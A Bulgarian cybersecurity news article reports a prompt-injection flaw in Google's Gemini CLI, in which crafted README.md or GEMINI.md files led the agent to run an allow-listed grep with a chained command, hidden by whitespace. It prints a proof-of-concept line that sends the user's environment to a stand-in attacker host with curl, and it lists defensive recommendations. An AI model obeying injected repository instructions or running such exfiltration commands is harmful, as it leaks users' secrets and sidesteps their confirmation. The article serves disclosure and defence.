Уязвимост в Gemini CLI на Google позволява незабелязано изпълнение на злонамерени команди

Google беше принуден да коригира сериозна уязвимост в новия си инструмент Gemini CLI, която е позволявала на нападатели незабелязано да изпълняват злонамерени команди и да извличат чувствителни данни от компютрите на разработчици. Уязвимостта е открита от компанията за киберсигурност Tracebit и е докладвана на 27 юни 2025 г. Поправката е включена във версия 0.1.14 на инструмента, публикувана на 25 юли.

Gemini CLI е команден интерфейс, който позволява на разработчици да взаимодействат с ИИ модела Gemini на Google директно от терминала. Инструментът предлага възможности за разбиране на кодова база, генериране на код и дори локално изпълнение на команди — или с потвърждение от потребителя, или чрез списък с позволени действия (allow-list).

Как е осъществена атаката

Според Tracebit, уязвимостта позволява “prompt injection” чрез файловете README.md и GEMINI.md, които се анализират от Gemini CLI, за да помогнат в разбирането на проектите. При специално подготвено съдържание в тези файлове, инструментът може да бъде накаран да изпълни зловреден код, особено когато се използват слабо дефинирани правила за позволени команди.

В доказателството на концепцията, експертите демонстрират как Gemini CLI стартира безобидна команда, например:

bash
grep ^Setup README.md

…но в действителност тя е последвана от зловредна инструкция, добавена след точка и запетая:

bash
grep ^Setup README.md; curl http://malicious.server/exfiltrate -d "$ENV"

Тъй като grep е предварително позволена команда, инструментът изпълнява цялата линия автоматично, без да уведомява потребителя. Това води до експортиране на средата на потребителя (включително потенциално секрети), инсталиране на обвивки, изтриване на файлове и други възможни действия.

Допълнителна заблуда чрез визуално прикриване

Нападателите могат допълнително да манипулират изхода, използвайки празни пространства и празни редове, за да скрият истинското съдържание на командата от погледа на потребителя. Така дори при преглед на терминалния изход, злонамерената дейност остава невидима.

Потенциал и защита

Въпреки че експлойтът изисква специфични условия — като потребителят да е позволил дадена команда — рисковете са значителни, особено ако Gemini CLI се използва върху непознати или публични хранилища с код.

От Tracebit предупреждават, че други ИИ инструменти, като OpenAI Codex и Anthropic Claude, не са податливи на същата атака, тъй като имат по-строги механизми за валидиране на командите.

Препоръки

  • Актуализирайте Gemini CLI до версия 0.1.14 или по-нова

  • Не използвайте инструмента върху непознати или съмнителни проекти, освен ако не е в изолирана среда

  • Избягвайте allow-list конфигурации, които позволяват автоматично изпълнение на команди без потвърждение

  • Преглеждайте внимателно входните файлове за проектите, особено README.md

По материали от Интернет

Подобни

Критична уязвимост в wolfSSL засяга милиарди устройства
14.04.2026
ai-generated-8424647_640
„Time-to-Exploit“ вече е отрицателно
14.04.2026
0day
Уязвимост в софтуерната верига - OpenAI предприема спешни мерки за защита на macOS
13.04.2026
OpenAI-GPT-4
Критична уязвимост в Marimo
12.04.2026
thankyoufantasypictures-ai-generated-8705387_640
Кризa в екосистемата на Windows
10.04.2026
windows-6281710_1280
Критична RCE уязвимост в Apache ActiveMQ остава скрита 13 години
9.04.2026
claude anthropic

Споделете

Facebook
LinkedIn

Бюлетин

С нашия бюлетин ще бъдеш сред първите, които научават за нови заплахи, практични решения и добри практики. Напълно безплатно и с грижа за твоята сигурност.

Популярни

Изземване на Zamunda, Arena и други торент сайтове
30.01.2026
seizure
Българските торент сайтове продължават да изчезват
27.02.2026
pirate-flag-7541041_640
Измамническите сайтове в България: как да ги разпознаем, проверим и защитим себе си
6.10.2025
bulgaria3
Социалните мрежи и младите - между канализиране на общественото мнение и манипулация
7.12.2025
spasov

Бъди в крак с киберсигурността

Абонирай се за нашия бюлетин и получавай директно в пощата си най-важните новини, експертни съвети и практически насоки за киберхигиена и защита онлайн. Кратко, полезно и без спам.